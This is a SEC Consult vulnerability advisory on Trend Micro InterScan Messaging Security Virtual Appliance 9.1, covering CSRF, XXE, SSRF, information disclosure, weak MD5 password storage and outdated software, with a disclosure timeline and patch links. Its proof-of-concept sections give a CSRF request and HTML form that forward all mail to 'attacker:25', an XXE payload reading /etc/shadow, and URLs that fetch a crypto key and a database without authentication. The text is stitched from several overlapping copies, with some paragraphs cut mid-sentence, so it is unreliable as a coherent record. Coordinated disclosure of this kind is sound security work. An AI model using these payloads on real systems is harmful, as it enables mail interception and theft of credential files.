#3 in the hardening/patch of the product as admin and enabled accounts are as important as root and changing the architecture would cause some functions not to work as expected. 4) Server Side Request Forgery (SSRF) & Local File Disclosure (CVE-2020-27018) The URL demonstrates the retrieval of an HTTP URL through the appliance: https://<host>:8445/widget/proxy_controller.php?module=modSimple&userGenerated=1&serverid=1&url=http://test When accessing file:// URLs, the application sends only the content that follows a sequence \r\n\r\n. Therefore only parts of certain files can be retrieved. 5) Information Disclosure (CVE-2020-27019) The following URL demonstrates the unauthenticated retrieval of a cryptographic key: https://<host>:8445/widget/repository/inc/class/common/crypt/crypt.key Moreover, an SQLite database can be retrieved. https://<host>:8445/widget/repository/db/sqlite/tmwf.db The contents of these files have not been further investigated. 6) Insufficient Password Storage (CVE-2020-27693) The passwords for local administrators are stored in a Postgres database (table tb_administrator, column md5_digest). The hashes are stored as unsalted MD5 digests which can be cracked easily. 7) Outdated Software (CVE-2020-27694) The following software versions are present in an appliance with patch level 1993: * PHP 5.6.38 (PHP 5.6 is EOL) * Apache HTTPD 2.4.37 (see http://httpd.apache.org/security/vulnerabilities_24.html) * Apache Tomcat 9.0.13 (see http://tomcat.apache.org/security-9.html) The appliance is built on top of a CentOS base system. The CentOS packages appear not to be updated with appliance updates. In a test system, the command "yum check-update" yielded 203 updates to installed packages. Vulnerable / tested versions: ----------------------------- Version 9.1.0.1960 Critical Patch 1993 has been tested and was found to be vulnerable. Previous versions are affected as well. Vendor contact timeline: ------------------------ 2020-04-28: Contacting vendor through security@trendmicro.com Submitting advisory information encrypted (PGP). 2020-04-28: Vendor reply, they will take a look at the issue. 2020-05-06: Vendor states that vulnerability resolution is in progress; Vendor has questions regarding two vulnerabilities 2020-05-07: Clarifying vulnerabilities 2020-05-25: Asking for status update 2020-05-25: Vendor: Vulnerability resolution is still in progress, details follow 2020-05-27: Vendor: A fix for 4 vulnerabilities is expected for the end of June 2020-06-29: Asking for status update 2020-07-01: Vendor provides prerelease update that addresses #1, #2, #4, #5, #6 2020-07-07: Sending results of short recheck #1 CSRF - fixed #2 XXE - fixed #4 SSRF/LFD - fixed #5 InfoDisc - fixed #6 Password Storage - not properly fixed yet 2020-07-08: Vendor confirms receipt; has question regarding #3 2020-07-10: Clarifying questions 2020-08-04: Asking for a status update 2020-08-04: Vendor: Issue #3 is under investigation, issue #7 in progress. 2020-08-22: Vendor provides information that all issues have been fixed except issue #3 as hardening it further would potentially break some features. 2020-08-24: Further advisory release coordination (date, CVE numbers, patch version) 2020-09-18: Asking for a status update; Answer: "The hotfix is ready, however, the official critical patch to be used for public disclosure is still being finalized"; disclosure date will be communicated later 2020-10-23: Patch is already public since 2020-10-09, but no security bulletin yet which will be coordinated 2020-11-04: Coordinated release of security advisory Solution: --------- The vendor provides a patch (9.1 Patch 3 - Critical Patch - Build 2025) which should be installed immediately. The release notes can be found here: https://files.trendmicro.com/documentation/readme/imsva_91_en_criticalpatch_b2025_EN_Readme.txt Patch download: https://downloadcenter.trendmicro.com/index.php?regs=nabu&prodid=91 https://files.trendmicro.com/products/imsva/9.1/imsva_91_en_criticalpatch_b2025.tar.gz Trend Micro Security Bulletin: https://success.trendmicro.com/solution/000279833 Workaround: ----------- No workaround available. Advisory URL: ------------- https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Europe | Asia | North America About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://www.sec-consult.com/en/career/index.html Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://www.sec-consult.com/en/contact/index.html ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF W. Ettlinger / @2020

Trend Micro InterScan Messaging Security Virtual Appliance (IMSVA) 9.1 is vulnerable to a server side request forgery vulnerability which could allow an authenticated attacker to abuse the product's web server and grant access to web resources or parts of local files. An attacker must already have obtained authenticated privileges on the product to exploit this vulnerability. An attacker can use the web page controlled by the vulnerability to modify the policy rules. SEC Consult Vulnerability Lab Security Advisory < 20201104-0 > ======================================================================= title: Multiple Vulnerabilities product: Trend Micro InterScan Messaging Security Virtual Appliance (IMSVA) vulnerable version: < 9.1.0 Critical Patch Build 2025 fixed version: 9.1.0 Critical Patch - Build 2025 CVE number: CVE-2020-27016, CVE-2020-27017, CVE-2020-27018, CVE-2020-27019 CVE-2020-27693, CVE-2020-27694 impact: High homepage: https://www.trendmicro.com/en_us/business/products/user-protection/sps/email-and-collaboration/interscan-messaging.html found: 2020-04 by: W. Ettlinger (Office Vienna) T. Serafin (Office Munich) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "Trend Micro™ InterScan™ Messaging Security provides the most comprehensive protection against both traditional and targeted attacks. Using the correlated intelligence from Trend Micro™ Smart Protection Network™ and optional sandbox execution analysis, it blocks spam, phishing, and advanced persistent threats (APTs)." URL: https://www.trendmicro.com/en_us/business/products/user-protection/sps/email-and-collaboration/interscan-messaging.html Business recommendation: ------------------------ The vendor provides a patch which should be installed immediately. SEC Consult highly recommends to perform a thorough security review of this and similar Trend Micro products conducted by security professionals to identify and resolve potential further security issues. This web service can also be accessed by leveraging a CSRF scenario. bypass malware checks or forward all mails to another host) by tricking an authenticated administrator into accessing an attacker-controlled web page. 2) XML External Entity Processing (XXE) CVE-2020-27017 (7.6 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:L) The web service from vulnerability #1 accepts requests in the form of XML documents. The XML parser used is not configured correctly, thus allowing an authenticated administrator to read arbitrary local files through XXE. Through an OOB XXE attack an attacker can exfiltrate local files through CSRF (see #1). 3) Over-privileged Users/Services Sudo is configured to allow several system users access to the root account. An attacker gaining control over one of these accounts can access the system as root. Moreover, several services are executed with the privileges of the user root. Therefore, finding #2 allows an attacker to read files only accessible to root (e.g. /etc/shadow). http(s), file). An authenticated attacker can e.g. access any http(s) resources or parts of some local files. 5) Information Disclosure CVE-2020-27019 (4.8 CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L/E:U/RL:X/RC:X) An SQLite database as well as a cryptographic key located in the webroot can be accessed without authentication. Note: It is unclear what the key is used for and whether the SQLite database could contain sensitive information in specific configurations. 6) Insufficient Password Storage CVE-2020-27693 (3.1 CVSS:3.0/AV:L/AC:L/PR:H/UI:R/S:U/C:L/I:N/A:L/E:U/RL:X/RC:X) The appliance stores passwords of administrative users as unsalted MD5 hashes which can be cracked easily. 7) Outdated Software CVE-2020-27694 (4.6 CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:L/E:U/RL:X/RC:X) Several software components installed on the appliance are outdated. Moreover, the software updates provided by Trend Micro do not update the packages of the CentOS base system. SEC Consult did not verify whether the vulnerabilities identified through the version information are present or whether the vulnerabilities have an impact on the security of the system. Proof of concept: ----------------- 1) Cross-Site Request Forgery (CSRF) (CVE-2020-27016) The following request will create a rule that forwards all mails to an attacker: --- snip --- POST /ws_policies.imss HTTP/1.1 Host: [...] Cookie: JSESSIONID=[...]; Content-Length: 374 <policies> <policy name="forward all traffic to attacker" note="forward all traffic to attacker" enable="yes" version="1" order="1" type="other"> <route direction="incoming"> <from anyone="yes"></from> <to anyone="yes"></to> </route> <actions> <hand_off>attacker:25</hand_off> </actions> </policy> </policies> --- snip --- The following HTML fragment shows how this request can be sent in a CSRF scenario: --- snip --- <form action="https://[...]:8445/ws_policies.imss" method="POST" enctype="text/plain"> <input type="hidden" name='<policies><policy name' value='"forward all traffic to attacker" note="forward all traffic to attacker" enable="yes" version="1" order="1" type="other"> <route direction="incoming"><from anyone="yes"></from> <to anyone="yes"></to></route> <actions><hand_off>attacker:25</hand_off></actions> </policy></policies>' /> <input type="submit" value="Submit request" /> </form> --- snip --- 2) XML External Entity Processing (XXE) (CVE-2020-27017) The following request demonstrates the retrieval of /etc/shadow --- snip --- POST /ws_policies.imss HTTP/1.1 Host: [...]:8445 Cookie: JSESSIONID=[...]; Content-Length: 290 <!DOCTYPE foo [<!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/shadow" >]> <policies> <policy name="test" note="test" enable="yes" version="1" order="2" type="virus"> <route direction="incoming"> <from anyone="no"> <group>&xxe;</group> </from> </route> </policy> </policies> --- snip --- 3) Over-privileged Users/Services The local users "admin", "enable" and all users in the group "cliusers" can execute commands as root (no password entry required). Note that at least for the users "admin" and "enable" a restricted shell is configured, thus shell access is not easily possible. Several network services (e.g. Tomcat, OpenLDAP, imssmgr) are executed as root. Trend Micro supplied the following additional information: (a) If an IMSVA user created clish users, they can only run limited commands (IMSVA pre-defined commands) and all of these are one time commands (not a running service in the backend) (b) Most of these clish commands only read logs, and does not accept any arguments, so it cannot terminate or inject commands. (c) Few commands (such as ping) only accept few arguments (such as IP), but these are well-checked. Users cannot input any arguments with other meaning, so it cannot terminate or inject commands. Trend Micro decided not to include vulnerability #3 in the hardening/patch of the product as admin and enabled accounts are as important as root and changing the architecture would cause some functions not to work as expected. 4) Server Side Request Forgery (SSRF) & Local File Disclosure (CVE-2020-27018) The URL demonstrates the retrieval of an HTTP URL through the appliance: https://<host>:8445/widget/proxy_controller.php?module=modSimple&userGenerated=1&serverid=1&url=http://test When accessing file:// URLs, the application sends only the content that follows a sequence \r\n\r\n. Therefore only parts of certain files can be retrieved. 5) Information Disclosure (CVE-2020-27019) The following URL demonstrates the unauthenticated retrieval of a cryptographic key: https://<host>:8445/widget/repository/inc/class/common/crypt/crypt.key Moreover, an SQLite database can be retrieved. https://<host>:8445/widget/repository/db/sqlite/tmwf.db The contents of these files have not been further investigated. 6) Insufficient Password Storage (CVE-2020-27693) The passwords for local administrators are stored in a Postgres database (table tb_administrator, column md5_digest). The hashes are stored as unsalted MD5 digests which can be cracked easily. 7) Outdated Software (CVE-2020-27694) The following software versions are present in an appliance with patch level 1993: * PHP 5.6.38 (PHP 5.6 is EOL) * Apache HTTPD 2.4.37 (see http://httpd.apache.org/security/vulnerabilities_24.html) * Apache Tomcat 9.0.13 (see http://tomcat.apache.org/security-9.html) The appliance is built on top of a CentOS base system. The CentOS packages appear not to be updated with appliance updates. In a test system, the command "yum check-update" yielded 203 updates to installed packages. Vulnerable / tested versions: ----------------------------- Version 9.1.0.1960 Critical Patch 1993 has been tested and was found to be vulnerable. Previous versions are affected as well. Vendor contact timeline: ------------------------ 2020-04-28: Contacting vendor through security@trendmicro.com Submitting advisory information encrypted (PGP). 2020-04-28: Vendor reply, they will take a look at the issue. 2020-05-06: Vendor states that vulnerability resolution is in progress; Vendor has questions regarding two vulnerabilities 2020-05-07: Clarifying vulnerabilities 2020-05-25: Asking for status update 2020-05-25: Vendor: Vulnerability resolution is still in progress, details follow 2020-05-27: Vendor: A fix for 4 vulnerabilities is expected for the end of June 2020-06-29: Asking for status update 2020-07-01: Vendor provides prerelease update that addresses #1, #2, #4, #5, #6 2020-07-07: Sending results of short recheck #1 CSRF - fixed #2 XXE - fixed #4 SSRF/LFD - fixed #5 InfoDisc - fixed #6 Password Storage - not properly fixed yet 2020-07-08: Vendor confirms receipt; has question regarding #3 2020-07-10: Clarifying questions 2020-08-04: Asking for a status update 2020-08-04: Vendor: Issue #3 is under investigation, issue #7 in progress. 2020-08-22: Vendor provides information that all issues have been fixed except issue #3 as hardening it further would potentially break some features. 2020-08-24: Further advisory release coordination (date, CVE numbers, patch version) 2020-09-18: Asking for a status update; Answer: "The hotfix is ready, however, the official critical patch to be used for public disclosure is still being finalized"; disclosure date will be communicated later 2020-10-23: Patch is already public since 2020-10-09, but no security bulletin yet which will be coordinated 2020-11-04: Coordinated release of security advisory Solution: --------- The vendor provides a patch (9.1 Patch 3 - Critical Patch - Build 2025) which should be installed immediately. The release notes can be found here: https://files.trendmicro.com/documentation/readme/imsva_91_en_criticalpatch_b2025_EN_Readme.txt Patch download: https://downloadcenter.trendmicro.com/index.php?regs=nabu&prodid=91 https://files.trendmicro.com/products/imsva/9.1/imsva_91_en_criticalpatch_b2025.tar.gz Trend Micro Security Bulletin: https://success.trendmicro.com/solution/000279833 Workaround: ----------- No workaround available. Advisory URL: ------------- https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Europe | Asia | North America About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://www.sec-consult.com/en/career/index.html Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://www.sec-consult.com/en/contact/index.html ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF W. Ettlinger / @2020

Trend Micro InterScan Messaging Security Virtual Appliance (IMSVA) 9.1 is vulnerable to a cross-site request forgery (CSRF) vulnerability which could allow an attacker to modify policy rules by tricking an authenticated administrator into accessing an attacker-controlled web page. An attacker must already have obtained product administrator/root privileges to exploit this vulnerability. An attacker can use this vulnerability to send unexpected requests to the server through the affected client. SEC Consult Vulnerability Lab Security Advisory < 20201104-0 > ======================================================================= title: Multiple Vulnerabilities product: Trend Micro InterScan Messaging Security Virtual Appliance (IMSVA) vulnerable version: < 9.1.0 Critical Patch Build 2025 fixed version: 9.1.0 Critical Patch - Build 2025 CVE number: CVE-2020-27016, CVE-2020-27017, CVE-2020-27018, CVE-2020-27019 CVE-2020-27693, CVE-2020-27694 impact: High homepage: https://www.trendmicro.com/en_us/business/products/user-protection/sps/email-and-collaboration/interscan-messaging.html found: 2020-04 by: W. Ettlinger (Office Vienna) T. Serafin (Office Munich) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "Trend Micro™ InterScan™ Messaging Security provides the most comprehensive protection against both traditional and targeted attacks. Using the correlated intelligence from Trend Micro™ Smart Protection Network™ and optional sandbox execution analysis, it blocks spam, phishing, and advanced persistent threats (APTs)." URL: https://www.trendmicro.com/en_us/business/products/user-protection/sps/email-and-collaboration/interscan-messaging.html Business recommendation: ------------------------ The vendor provides a patch which should be installed immediately. SEC Consult highly recommends to perform a thorough security review of this and similar Trend Micro products conducted by security professionals to identify and resolve potential further security issues. This web service can also be accessed by leveraging a CSRF scenario. An attacker could therefore modify policy rules (e.g. bypass malware checks or forward all mails to another host) by tricking an authenticated administrator into accessing an attacker-controlled web page. 2) XML External Entity Processing (XXE) CVE-2020-27017 (7.6 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:L) The web service from vulnerability #1 accepts requests in the form of XML documents. The XML parser used is not configured correctly, thus allowing an authenticated administrator to read arbitrary local files through XXE. Through an OOB XXE attack an attacker can exfiltrate local files through CSRF (see #1). 3) Over-privileged Users/Services Sudo is configured to allow several system users access to the root account. An attacker gaining control over one of these accounts can access the system as root. Moreover, several services are executed with the privileges of the user root. Therefore, finding #2 allows an attacker to read files only accessible to root (e.g. /etc/shadow). 4) Server Side Request Forgery (SSRF) & Local File Disclosure CVE-2020-27018 (2.8 CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N/E:U/RL:X/RC:X) A script accessible through the appliance's web server can be abused to request any URL (e.g. http(s), file). An authenticated attacker can e.g. access any http(s) resources or parts of some local files. 5) Information Disclosure CVE-2020-27019 (4.8 CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L/E:U/RL:X/RC:X) An SQLite database as well as a cryptographic key located in the webroot can be accessed without authentication. Note: It is unclear what the key is used for and whether the SQLite database could contain sensitive information in specific configurations. 6) Insufficient Password Storage CVE-2020-27693 (3.1 CVSS:3.0/AV:L/AC:L/PR:H/UI:R/S:U/C:L/I:N/A:L/E:U/RL:X/RC:X) The appliance stores passwords of administrative users as unsalted MD5 hashes which can be cracked easily. 7) Outdated Software CVE-2020-27694 (4.6 CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:L/E:U/RL:X/RC:X) Several software components installed on the appliance are outdated. Moreover, the software updates provided by Trend Micro do not update the packages of the CentOS base system. SEC Consult did not verify whether the vulnerabilities identified through the version information are present or whether the vulnerabilities have an impact on the security of the system. Proof of concept: ----------------- 1) Cross-Site Request Forgery (CSRF) (CVE-2020-27016) The following request will create a rule that forwards all mails to an attacker: --- snip --- POST /ws_policies.imss HTTP/1.1 Host: [...] Cookie: JSESSIONID=[...]; Content-Length: 374 <policies> <policy name="forward all traffic to attacker" note="forward all traffic to attacker" enable="yes" version="1" order="1" type="other"> <route direction="incoming"> <from anyone="yes"></from> <to anyone="yes"></to> </route> <actions> <hand_off>attacker:25</hand_off> </actions> </policy> </policies> --- snip --- The following HTML fragment shows how this request can be sent in a CSRF scenario: --- snip --- <form action="https://[...]:8445/ws_policies.imss" method="POST" enctype="text/plain"> <input type="hidden" name='<policies><policy name' value='"forward all traffic to attacker" note="forward all traffic to attacker" enable="yes" version="1" order="1" type="other"> <route direction="incoming"><from anyone="yes"></from> <to anyone="yes"></to></route> <actions><hand_off>attacker:25</hand_off></actions> </policy></policies>' /> <input type="submit" value="Submit request" /> </form> --- snip --- 2) XML External Entity Processing (XXE) (CVE-2020-27017) The following request demonstrates the retrieval of /etc/shadow --- snip --- POST /ws_policies.imss HTTP/1.1 Host: [...]:8445 Cookie: JSESSIONID=[...]; Content-Length: 290 <!DOCTYPE foo [<!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/shadow" >]> <policies> <policy name="test" note="test" enable="yes" version="1" order="2" type="virus"> <route direction="incoming"> <from anyone="no"> <group>&xxe;</group> </from> </route> </policy> </policies> --- snip --- 3) Over-privileged Users/Services The local users "admin", "enable" and all users in the group "cliusers" can execute commands as root (no password entry required). Note that at least for the users "admin" and "enable" a restricted shell is configured, thus shell access is not easily possible. Several network services (e.g. Tomcat, OpenLDAP, imssmgr) are executed as root. Trend Micro supplied the following additional information: (a) If an IMSVA user created clish users, they can only run limited commands (IMSVA pre-defined commands) and all of these are one time commands (not a running service in the backend) (b) Most of these clish commands only read logs, and does not accept any arguments, so it cannot terminate or inject commands. (c) Few commands (such as ping) only accept few arguments (such as IP), but these are well-checked. Users cannot input any arguments with other meaning, so it cannot terminate or inject commands. Trend Micro decided not to include vulnerability #3 in the hardening/patch of the product as admin and enabled accounts are as important as root and changing the architecture would cause some functions not to work as expected. 4) Server Side Request Forgery (SSRF) & Local File Disclosure (CVE-2020-27018) The URL demonstrates the retrieval of an HTTP URL through the appliance: https://<host>:8445/widget/proxy_controller.php?module=modSimple&userGenerated=1&serverid=1&url=http://test When accessing file:// URLs, the application sends only the content that follows a sequence \r\n\r\n. Therefore only parts of certain files can be retrieved. 5) Information Disclosure (CVE-2020-27019) The following URL demonstrates the unauthenticated retrieval of a cryptographic key: https://<host>:8445/widget/repository/inc/class/common/crypt/crypt.key Moreover, an SQLite database can be retrieved. https://<host>:8445/widget/repository/db/sqlite/tmwf.db The contents of these files have not been further investigated. 6) Insufficient Password Storage (CVE-2020-27693) The passwords for local administrators are stored in a Postgres database (table tb_administrator, column md5_digest). The hashes are stored as unsalted MD5 digests which can be cracked easily. 7) Outdated Software (CVE-2020-27694) The following software versions are present in an appliance with patch level 1993: * PHP 5.6.38 (PHP 5.6 is EOL) * Apache HTTPD 2.4.37 (see http://httpd.apache.org/security/vulnerabilities_24.html) * Apache Tomcat 9.0.13 (see http://tomcat.apache.org/security-9.html) The appliance is built on top of a CentOS base system. The CentOS packages appear not to be updated with appliance updates. In a test system, the command "yum check-update" yielded 203 updates to installed packages. Vulnerable / tested versions: ----------------------------- Version 9.1.0.1960 Critical Patch 1993 has been tested and was found to be vulnerable. Previous versions are affected as well. Vendor contact timeline: ------------------------ 2020-04-28: Contacting vendor through security@trendmicro.com Submitting advisory information encrypted (PGP). 2020-04-28: Vendor reply, they will take a look at the issue. 2020-05-06: Vendor states that vulnerability resolution is in progress; Vendor has questions regarding two vulnerabilities 2020-05-07: Clarifying vulnerabilities 2020-05-25: Asking for status update 2020-05-25: Vendor: Vulnerability resolution is still in progress, details follow 2020-05-27: Vendor: A fix for 4 vulnerabilities is expected for the end of June 2020-06-29: Asking for status update 2020-07-01: Vendor provides prerelease update that addresses #1, #2, #4, #5, #6 2020-07-07: Sending results of short recheck #1 CSRF - fixed #2 XXE - fixed #4 SSRF/LFD - fixed #5 InfoDisc - fixed #6 Password Storage - not properly fixed yet 2020-07-08: Vendor confirms receipt; has question regarding #3 2020-07-10: Clarifying questions 2020-08-04: Asking for a status update 2020-08-04: Vendor: Issue #3 is under investigation, issue #7 in progress. 2020-08-22: Vendor provides information that all issues have been fixed except issue #3 as hardening it further would potentially break some features. 2020-08-24: Further advisory release coordination (date, CVE numbers, patch version) 2020-09-18: Asking for a status update; Answer: "The hotfix is ready, however, the official critical patch to be used for public disclosure is still being finalized"; disclosure date will be communicated later 2020-10-23: Patch is already public since 2020-10-09, but no security bulletin yet which will be coordinated 2020-11-04: Coordinated release of security advisory Solution: --------- The vendor provides a patch (9.1 Patch 3 - Critical Patch - Build 2025) which should be installed immediately. The release notes can be found here: https://files.trendmicro.com/documentation/readme/imsva_91_en_criticalpatch_b2025_EN_Readme.txt Patch download: https://downloadcenter.trendmicro.com/index.php?regs=nabu&prodid=91 https://files.trendmicro.com/products/imsva/9.1/imsva_91_en_criticalpatch_b2025.tar.gz Trend Micro Security Bulletin: https://success.trendmicro.com/solution/000279833 Workaround: ----------- No workaround available. Advisory URL: ------------- https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Europe | Asia | North America About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://www.sec-consult.com/en/career/index.html Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://www.sec-consult.com/en/contact/index.html ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF W. Ettlinger / @2020

Trend Micro InterScan Messaging Security Virtual Appliance (IMSVA) 9.1 is vulnerable to an XML External Entity Processing (XXE) vulnerability which could allow an authenticated administrator to read arbitrary local files. An attacker must already have obtained product administrator/root privileges to exploit this vulnerability. Attackers can use the vulnerability to read arbitrary local files. SEC Consult Vulnerability Lab Security Advisory < 20201104-0 > ======================================================================= title: Multiple Vulnerabilities product: Trend Micro InterScan Messaging Security Virtual Appliance (IMSVA) vulnerable version: < 9.1.0 Critical Patch Build 2025 fixed version: 9.1.0 Critical Patch - Build 2025 CVE number: CVE-2020-27016, CVE-2020-27017, CVE-2020-27018, CVE-2020-27019 CVE-2020-27693, CVE-2020-27694 impact: High homepage: https://www.trendmicro.com/en_us/business/products/user-protection/sps/email-and-collaboration/interscan-messaging.html found: 2020-04 by: W. Ettlinger (Office Vienna) T. Serafin (Office Munich) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "Trend Micro™ InterScan™ Messaging Security provides the most comprehensive protection against both traditional and targeted attacks. Using the correlated intelligence from Trend Micro™ Smart Protection Network™ and optional sandbox execution analysis, it blocks spam, phishing, and advanced persistent threats (APTs)." URL: https://www.trendmicro.com/en_us/business/products/user-protection/sps/email-and-collaboration/interscan-messaging.html Business recommendation: ------------------------ The vendor provides a patch which should be installed immediately. SEC Consult highly recommends to perform a thorough security review of this and similar Trend Micro products conducted by security professionals to identify and resolve potential further security issues. Vulnerability overview/description: ----------------------------------- 1) Cross-Site Request Forgery (CSRF CVE-2020-27016 (7.5 CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H) A web service accessible to authenticated administrators allows modifying the appliance's policy configuration. This web service can also be accessed by leveraging a CSRF scenario. An attacker could therefore modify policy rules (e.g. bypass malware checks or forward all mails to another host) by tricking an authenticated administrator into accessing an attacker-controlled web page. 2) XML External Entity Processing (XXE) CVE-2020-27017 (7.6 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:L) The web service from vulnerability #1 accepts requests in the form of XML documents. 3) Over-privileged Users/Services Sudo is configured to allow several system users access to the root account. An attacker gaining control over one of these accounts can access the system as root. Moreover, several services are executed with the privileges of the user root. Therefore, finding #2 allows an attacker to read files only accessible to root (e.g. /etc/shadow). 4) Server Side Request Forgery (SSRF) & Local File Disclosure CVE-2020-27018 (2.8 CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N/E:U/RL:X/RC:X) A script accessible through the appliance's web server can be abused to request any URL (e.g. http(s), file). An authenticated attacker can e.g. access any http(s) resources or parts of some local files. 5) Information Disclosure CVE-2020-27019 (4.8 CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L/E:U/RL:X/RC:X) An SQLite database as well as a cryptographic key located in the webroot can be accessed without authentication. Note: It is unclear what the key is used for and whether the SQLite database could contain sensitive information in specific configurations. 6) Insufficient Password Storage CVE-2020-27693 (3.1 CVSS:3.0/AV:L/AC:L/PR:H/UI:R/S:U/C:L/I:N/A:L/E:U/RL:X/RC:X) The appliance stores passwords of administrative users as unsalted MD5 hashes which can be cracked easily. 7) Outdated Software CVE-2020-27694 (4.6 CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:L/E:U/RL:X/RC:X) Several software components installed on the appliance are outdated. Moreover, the software updates provided by Trend Micro do not update the packages of the CentOS base system. SEC Consult did not verify whether the vulnerabilities identified through the version information are present or whether the vulnerabilities have an impact on the security of the system. Proof of concept: ----------------- 1) Cross-Site Request Forgery (CSRF) (CVE-2020-27016) The following request will create a rule that forwards all mails to an attacker: --- snip --- POST /ws_policies.imss HTTP/1.1 Host: [...] Cookie: JSESSIONID=[...]; Content-Length: 374 <policies> <policy name="forward all traffic to attacker" note="forward all traffic to attacker" enable="yes" version="1" order="1" type="other"> <route direction="incoming"> <from anyone="yes"></from> <to anyone="yes"></to> </route> <actions> <hand_off>attacker:25</hand_off> </actions> </policy> </policies> --- snip --- The following HTML fragment shows how this request can be sent in a CSRF scenario: --- snip --- <form action="https://[...]:8445/ws_policies.imss" method="POST" enctype="text/plain"> <input type="hidden" name='<policies><policy name' value='"forward all traffic to attacker" note="forward all traffic to attacker" enable="yes" version="1" order="1" type="other"> <route direction="incoming"><from anyone="yes"></from> <to anyone="yes"></to></route> <actions><hand_off>attacker:25</hand_off></actions> </policy></policies>' /> <input type="submit" value="Submit request" /> </form> --- snip --- 2) XML External Entity Processing (XXE) (CVE-2020-27017) The following request demonstrates the retrieval of /etc/shadow --- snip --- POST /ws_policies.imss HTTP/1.1 Host: [...]:8445 Cookie: JSESSIONID=[...]; Content-Length: 290 <!DOCTYPE foo [<!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/shadow" >]> <policies> <policy name="test" note="test" enable="yes" version="1" order="2" type="virus"> <route direction="incoming"> <from anyone="no"> <group>&xxe;</group> </from> </route> </policy> </policies> --- snip --- 3) Over-privileged Users/Services The local users "admin", "enable" and all users in the group "cliusers" can execute commands as root (no password entry required). Note that at least for the users "admin" and "enable" a restricted shell is configured, thus shell access is not easily possible. Several network services (e.g. Tomcat, OpenLDAP, imssmgr) are executed as root. Trend Micro supplied the following additional information: (a) If an IMSVA user created clish users, they can only run limited commands (IMSVA pre-defined commands) and all of these are one time commands (not a running service in the backend) (b) Most of these clish commands only read logs, and does not accept any arguments, so it cannot terminate or inject commands. (c) Few commands (such as ping) only accept few arguments (such as IP), but these are 